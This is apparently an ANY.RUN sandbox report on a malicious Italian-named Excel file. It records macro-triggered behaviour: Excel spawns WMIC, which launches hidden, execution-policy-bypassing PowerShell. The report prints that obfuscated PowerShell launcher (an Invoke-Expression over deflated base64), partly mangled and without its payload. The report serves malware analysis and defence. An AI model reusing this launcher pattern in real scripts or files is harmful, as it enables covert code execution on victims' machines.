General Info

File name

doc483 del 04 Giugno _Srl.xls

Full analysis
https://app.any.run/tasks/f80860af-4baf-49c6-96b2-68b0e94f5256
Verdict
Malicious activity
Analysis date
6/12/2019, 09:57:41
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

Indicators:

MIME:
application/vnd.ms-excel
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: autore, Last Saved By: UTEnte, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jun 3 08:30:17 2019, Last Saved Time/Date: Tue Jun 4 07:23:56 2019, Security: 0
MD5

f8a360a6a4a8cb011c2ab2c4b7170108

SHA1

1cd82fbe69ea85e6fc26fca85bc80f038b29fd7a

SHA256

de96e1df1700e5f375ca645d67e01aabd2476b83cb1728750f0bd6a7e2e4d599

SSDEEP

3072:lj9n1DN3aM+UKc1/pnVv+00UcUW+gJDlYkEIuPm3fNRZmbaoFhZhR0cixIHm0qnm:Dn1DN3aM+UKc1/pnVv+00UcUW+gJDlYB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
180 seconds
Additional time used
120 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Starts Visual C# compiler
  • POWershelL.exe (PID: 2752)
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 1916)
  • EXCEL.EXE (PID: 3360)
Uses WMIC.EXE to create a new process
  • EXCEL.EXE (PID: 1916)
  • EXCEL.EXE (PID: 3360)
PowerShell script executed
  • POWershelL.exe (PID: 2752)
  • POWershelL.exe (PID: 1432)
Creates files in the user directory
  • POWershelL.exe (PID: 2752)
  • POWershelL.exe (PID: 1432)
Executed via WMI
  • POWershelL.exe (PID: 2752)
  • POWershelL.exe (PID: 1432)
Uses RUNDLL32.EXE to load library
  • rundll32.exe (PID: 764)
Application launched itself
  • rundll32.exe (PID: 764)
Manual execution by user
  • verclsid.exe (PID: 728)
  • EXCEL.EXE (PID: 1916)
  • rundll32.exe (PID: 764)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 1916)
  • EXCEL.EXE (PID: 3360)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.xls
|   Microsoft Excel sheet (78.9%)
EXIF
FlashPix
Author:
autore
LastModifiedBy:
UTEnte
Software:
Microsoft Excel
CreateDate:
2019:06:03 07:30:17
ModifyDate:
2019:06:04 06:23:56
Security:
None
CodePage:
Windows Latin 1 (Western European)
Company:
null
AppVersion:
16
ScaleCrop:
No
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
TitleOfParts
null
null
HeadingPairs
null
null
null
null
CompObjUserTypeLen:
42
CompObjUserType:
(Foglio di lavoro di Microsoft Excel 2003

Screenshots

Processes

Total processes
50
Monitored processes
12
Malicious processes
2
Suspicious processes
2

Behavior graph

+
start excel.exe no specs wmic.exe no specs powershell.exe no specs rundll32.exe no specs rundll32.exe no specs mctadmin.exe no specs verclsid.exe no specs excel.exe no specs wmic.exe no specs powershell.exe csc.exe cvtres.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3360
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\winspool.drv
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\winmm.dll
c:\windows\system32\oleacc.dll
c:\program files\common files\system\ado\msadox.dll

PID
3716
CMD
wMIc PROcEsS 'Call' CrEaTe "POWershelL -w 1 -eXeCutIonpoLIC bYpAss -NOninTeRA -NopRoFi -cOmmA sV P1LJ ( [StRing][ChAr]44 ) ; "\".("\" +[StrInG][CHAR]34 +"\"{1}{0}"\" +[StrInG][CHAR]34 +"\"-f'l'${P1LJ}'sa') l sal;.('l') t NEw-Object;&('l') k IeX;.('k')(&('t') Io.COmPRESSion.deFLATeSTreaM( [SyStEm.io.mEmOrYSTrEam] [cOnVErT]::FRoMBASe64sTrING(("\" +[StrInG][CHAR]34 +"\"{123}{20}{33}{17}{35}{103}{144}{89}{120}{124}{30}{116}{53}{4}{76}{25}{8}{84}{64}{71}{61}{107}{113}{95}{10}{57}{72}{93}{34}{125}{13}{127}{44}{49}{63}{28}{36}{12}{126}{98}{94}{115}{100}{88}{22}{39}{101}{131}{51}{32}{38}{77}{66}{37}{75}{56}{47}{112}{73}{130}{128}{52}{79}{5}{7}{15}{85}{132}{150}{121}{26}{147}{140}{43}{151}{109}{90}{118}{3}{70}{141}{91}{16}{41}{143}{45}{110}{74}{40}{31}{27}{78}{11}{59}{14}{119}{9}{21}{102}{117}{48}{60}{69}{97}{55}{29}{24}{142}{50}{114}{87}{139}{138}{67}{96}{148}{133}{149}{68}{42}{122}{2}{6}{137}{92}{19}{86}{23}{134}{108}{99}{145}{111}{104}{136}{129}{80}{58}{54}{46}{1}{81}{135}{105}{0}{18}{83}{146}{62}{82}{65}{106}"\" +[StrInG][CHO.cOMPReSSion.coMPrESSioNMODe]::deCOmpReSs ) |.('%'){ &('t') Io.StReamREaDer( `$_${P1LJ} [TexT.eNCODINg]::AScii)}|&('%'){ `$_.READtoeND( )} )"\" | . ( $PShOme[4]+$PshOME[30]+'X')"
Path
C:\Windows\System32\Wbem\wMIc.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
1432
CMD
POWershelL -w 1 -eXeCutIonpoLIC bYpAss -NOninTeRA -NopRoFi -cOmmA sV P1LJ ( [StRing][ChAr]44 ) ; "\".("\" +[StrInG][CHAR]34 +"\"{1}{0}"\" +[StrInG][CHAR]34 +"\"-f'l'${P1LJ}'sa') l sal;.('l') t NEw-Object;&('l') k IeX;.('k')(&('t') Io.COmPRESSion.deFLATeSTreaM( [SyStEm.io.mEmOrYSTrEam] [cOnVErT]::FRoMBASe64sTrING(("\" +[StrInG][CHAR]34 +"\"{123}{20}{33}{17}{35}{103}{144}{89}{120}{124}{30}{116}{53}{4}{76}{25}{8}{84}{64}{71}{61}{107}{113}{95}{10}{57}{72}{93}{34}{125}{13}{127}{44}{49}{63}{28}{36}{12}{126}{98}{94}{115}{100}{88}{22}{39}{101}{131}{51}{32}{38}{77}{66}{37}{75}{56}{47}{112}{73}{130}{128}{52}{79}{5}{7}{15}{85}{132}{150}{121}{26}{147}{140}{43}{151}{109}{90}{118}{3}{70}{141}{91}{16}{41}{143}{45}{110}{74}{40}{31}{27}{78}{11}{59}{14}{119}{9}{21}{102}{117}{48}{60}{69}{97}{55}{29}{24}{142}{50}{114}{87}{139}{138}{67}{96}{148}{133}{149}{68}{42}{122}{2}{6}{137}{92}{19}{86}{23}{134}{108}{99}{145}{111}{104}{136}{129}{80}{58}{54}{46}{1}{81}{135}{105}{0}{18}{83}{146}{62}{82}{65}{106}"\" +[StrInG][CHO.cOMPReSSion.coMPrESSioNMODe]::deCOmpReSs ) |.('%'){ &('t') Io.StReamREaDer( `$_${P1LJ} [TexT.eNCODINg]::AScii)}|&('%'){ `$_.READtoeND( )} )"\" | . ( $PShOme[4]+$PshOME[30]+'X')
Path
C:\Windows\System32\WindowsPowerShell\v1.0\POWershelL.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\netutils.dll

PID
764
CMD
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\intl.cpl
Path
C:\Windows\System32\rundll32.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\intl.cpl
c:\windows\system32\atl.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\sechost.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\input.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\ime\sptip.dll
c:\program files\windows nt\tabletextservice\tabletextservice.dll
c:\windows\system32\kbdit.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll

PID
3920
CMD
"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL input.dll
Path
C:\Windows\system32\rundll32.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\input.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\kbdus.dll

PID
2364
CMD
C:\Windows\system32\mctadmin.exe
Path
C:\Windows\system32\mctadmin.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
MCTAdmin
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mctadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
728
CMD
"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
Path
C:\Windows\system32\verclsid.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Extension CLSID Verification Host
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\verclsid.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\searchfolder.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll

PID
1916
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
